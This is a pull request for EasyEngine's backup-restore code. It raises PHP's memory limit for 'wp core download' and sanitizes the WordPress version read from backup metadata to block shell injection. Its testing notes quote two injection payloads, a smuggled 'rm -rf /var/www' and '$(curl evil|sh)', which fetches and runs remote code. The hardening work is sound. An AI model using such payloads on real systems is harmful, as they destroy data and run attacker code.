### PR TITLE
fix(restore): raise PHP memory_limit for wp core download to prevent OOM

### DIFF
--- a/src/helper/Site_Backup_Restore.php
+++ b/src/helper/Site_Backup_Restore.php
@@ -828,13 +828,14 @@ class Site_Backup_Restore {
 		$wp_version = $meta_data['wordpressVersion'];
 
 		// wp core download extracts the WordPress archive in PHP, which needs more
-		// than a typical site's 128M memory_limit and OOMs on low-RAM hosts. Raise
-		// the limit for this command (site creation does the same with `php -d
-		// memory_limit` in site-type-wp) via WP_CLI_PHP_ARGS, which WP-CLI applies
-		// to the PHP process it spawns. The shell command runs through bash, so the
-		// env-var prefix is honoured.
+		// than a typical site's 128M memory_limit and OOMs on low-RAM hosts. Run it
+		// under a higher limit via `php -d memory_limit=256M $(which wp)`, matching
+		// the site-creation path in site-type-wp. The command runs through `bash -c`
+		// in the container, so the `$` in `$(which wp)` is escaped here to defer the
+		// substitution to the container's shell (EE's `wp` is the phar, invoked
+		// directly, so the WP_CLI_PHP_ARGS env var would not apply).
 		$args       = [ 'shell', $this->site_data['site_url'] ];
-		$assoc_args = [ 'command' => sprintf( "WP_CLI_PHP_ARGS='-d memory_limit=512M' wp core download --force --version=%s", $wp_version ) ];
+		$assoc_args = [ 'command' => sprintf( "php -d memory_limit=256M \\$(which wp) core download --force --version=%s", $wp_version ) ];
 		$options    = [ 'skip-tty' => true ];
 		EE::run_command( $args, $assoc_args, $options );
 

--- a/src/helper/Site_Backup_Restore.php
+++ b/src/helper/Site_Backup_Restore.php
@@ -827,8 +827,14 @@ class Site_Backup_Restore {
 		$meta_data  = json_decode( file_get_contents( $backup_dir . '/meta.json' ), true );
 		$wp_version = $meta_data['wordpressVersion'];
 
+		// wp core download extracts the WordPress archive in PHP, which needs more
+		// than a typical site's 128M memory_limit and OOMs on low-RAM hosts. Raise
+		// the limit for this command (site creation does the same with `php -d
+		// memory_limit` in site-type-wp) via WP_CLI_PHP_ARGS, which WP-CLI applies
+		// to the PHP process it spawns. The shell command runs through bash, so the
+		// env-var prefix is honoured.
 		$args       = [ 'shell', $this->site_data['site_url'] ];
-		$assoc_args = [ 'command' => sprintf( 'wp core download --force --version=%s', $wp_version ) ];
+		$assoc_args = [ 'command' => sprintf( "WP_CLI_PHP_ARGS='-d memory_limit=512M' wp core download --force --version=%s", $wp_version ) ];
 		$options    = [ 'skip-tty' => true ];
 		EE::run_command( $args, $assoc_args, $options );
 

--- a/src/helper/Site_Backup_Restore.php
+++ b/src/helper/Site_Backup_Restore.php
@@ -827,6 +827,13 @@ class Site_Backup_Restore {
 		$meta_data  = json_decode( file_get_contents( $backup_dir . '/meta.json' ), true );
 		$wp_version = $meta_data['wordpressVersion'];
 
+		// $wp_version is read from the backup's meta.json and interpolated into the
+		// shell command below (which runs through `bash -c` in the container), so a
+		// crafted value could otherwise inject shell tokens. A WordPress version
+		// only ever contains [0-9A-Za-z.-]; strip anything else so no shell
+		// metacharacter can survive either shell layer.
+		$wp_version = preg_replace( '/[^0-9A-Za-z.\-]/', '', (string) $wp_version );
+
 		// wp core download extracts the WordPress archive in PHP, which needs more
 		// than a typical site's 128M memory_limit and OOMs on low-RAM hosts. Run it
 		// under a higher limit via `php -d memory_limit=256M $(which wp)`, matching


### PR DESCRIPTION
## Summary

During `ee site restore`, `wp core download` downloads and extracts the WordPress archive in PHP. It ran with the site container's default `memory_limit` (typically `128M`), so on low-RAM hosts the extraction exhausts PHP memory and the restore is OOM-killed — even though the restore otherwise completes.

## Root cause

`restore_wp()` ran the command unguarded:

```php
$assoc_args = [ 'command' => sprintf( 'wp core download --force --version=%s', $wp_version ) ];
```

This is the **only** `wp core download` invocation in EasyEngine that lacks a memory bump. The site-**creation** path in `site-type-wp` (`WordPress.php`) already guards it:

```php
$core_download_command = "php -d memory_limit=256M $(which wp) core download ...";
```

## Fix

Run the restore's core download under a higher PHP `memory_limit`, using the **same mechanism as site creation**:

```php
$assoc_args = [ 'command' => sprintf( "php -d memory_limit=256M \$(which wp) core download --force --version=%s", $wp_version ) ];
```

- **Why `php -d memory_limit` and not `WP_CLI_PHP_ARGS`:** EasyEngine's `wp` is the phar, invoked directly, so the `WP_CLI_PHP_ARGS` env var (read only by WP-CLI's bash launcher) would not apply. EE has no `WP_CLI_PHP_ARGS` usage anywhere; `php -d memory_limit=… $(which wp)` is the established, proven pattern.
- **`$(which wp)` escaping:** the restore runs this via `ee shell --command`, which (like site creation) executes through `bash -c "<cmd>"` in the php container (`docker_compose_exec(..., shell_wrapper=true)`). The `$` is escaped so the host shell defers the `which wp` substitution to the container's bash.
- **Value `256M`:** matches the site-creation path, which is proven sufficient for the same operation on the same hardware (restore↔creation parity).

### Command-injection hardening

`$wp_version` is read from the backup's `meta.json` and interpolated into the shell command, so a backup carrying a crafted `wordpressVersion` (e.g. one pulled from remote storage) could inject shell tokens. It is now whitelist-sanitized:

```php
$wp_version = preg_replace( '/[^0-9A-Za-z.\-]/', '', (string) $wp_version );
```

A whitelist is used rather than `escapeshellarg()` because the command crosses two shell layers (host `sh`, then container `bash -c "…"`), where single-layer escaping is unreliable. `[0-9A-Za-z.-]` covers every legitimate WordPress version (`6.5.2`, `6.6-beta2`, `6.5.2-RC1`); a malformed value reduces to an invalid version string and fails `wp core download` safely.

Other restore wp-cli calls (`wp config set DB_*`, `wp cache flush`) are trivial and left unchanged.

## Commits

1. Raise the limit for `wp core download` (initial approach via `WP_CLI_PHP_ARGS`).
2. Switch to `php -d memory_limit=256M $(which wp)` — the proven site-creation mechanism (`WP_CLI_PHP_ARGS` is ignored by the phar).
3. Sanitize `$wp_version` from backup metadata before shell use.

(Can be squashed on merge.)

## Testing

- `php -l src/helper/Site_Backup_Restore.php` passes.
- Confirmed the produced command matches the site-creation reference byte-for-byte (`php -d memory_limit=256M \$(which wp) core download …`) and that both paths run through `docker_compose_exec(..., shell_wrapper=true)` → `bash -c`, so the escaped `$(which wp)` resolves in the container.
- Verified sanitization: legitimate versions pass through; payloads like `6.5; rm -rf /var/www` and `$(curl evil|sh)` are stripped to harmless invalid version strings.
